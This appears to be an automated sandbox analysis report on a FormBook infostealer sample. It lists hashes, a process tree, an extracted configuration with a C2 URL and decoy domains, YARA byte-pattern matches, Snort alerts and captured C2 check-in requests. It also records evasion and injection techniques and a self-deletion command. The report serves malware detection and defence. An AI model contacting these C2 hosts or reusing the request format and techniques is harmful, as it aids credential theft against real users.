Loading ...

Play interactive tourEdit tour

Windows Analysis Report cK1g5gckZR9VHjj.exe

Overview

General Information

Sample Name:cK1g5gckZR9VHjj.exe
Analysis ID:528618
MD5:5f19b9a3e41ef2e6ec3200bf4a246cec
SHA1:25638b49edf7444005e1e02fb5d972da5920e1d8
SHA256:afac806262706aea36f8c34cb56ffa94f49da9b39b752cfd077f9b921e972c1d
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cK1g5gckZR9VHjj.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe" MD5: 5F19B9A3E41EF2E6EC3200BF4A246CEC)
    • cK1g5gckZR9VHjj.exe (PID: 1312 cmdline: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe MD5: 5F19B9A3E41EF2E6EC3200BF4A246CEC)
    • cK1g5gckZR9VHjj.exe (PID: 6104 cmdline: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe MD5: 5F19B9A3E41EF2E6EC3200BF4A246CEC)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • netsh.exe (PID: 6904 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • cmd.exe (PID: 6900 cmdline: /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        2.0.cK1g5gckZR9VHjj.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.0.cK1g5gckZR9VHjj.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 18 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: cK1g5gckZR9VHjj.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: cK1g5gckZR9VHjj.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netsh.pdb source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
          Source: Binary string: netsh.pdbGCTL source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: cK1g5gckZR9VHjj.exe, cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 142.252.22.166 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.94.210.101 80
          Source: C:\Windows\explorer.exeDomain query: www.dragonmodz.net
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80
          Source: C:\Windows\explorer.exeDomain query: www.blueprintroslyn.com
          Source: C:\Windows\explorer.exeDomain query: www.qzttb.net
          Source: C:\Windows\explorer.exeDomain query: www.royaldears.com
          Source: C:\Windows\explorer.exeDomain query: www.pittsburghdata.center
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.spoiledzone.com/udeh/
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: Joe Sandbox ViewASN Name: ROOTNETWORKSUS ROOTNETWORKSUS
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd HTTP/1.1Host: www.qzttb.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd HTTP/1.1Host: www.royaldears.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd HTTP/1.1Host: www.dragonmodz.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 3.64.163.50 3.64.163.50
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: PHP/7.0.33X-Powered-By: ASP.NETDate: Thu, 25 Nov 2021 14:11:35 GMTConnection: closeContent-Length: 7447Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 31 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 32 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000005.00000000.381972183.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.396876565.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.358537483.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: unknownDNS traffic detected: queries for: www.qzttb.net
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd HTTP/1.1Host: www.qzttb.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd HTTP/1.1Host: www.royaldears.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd HTTP/1.1Host: www.dragonmodz.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
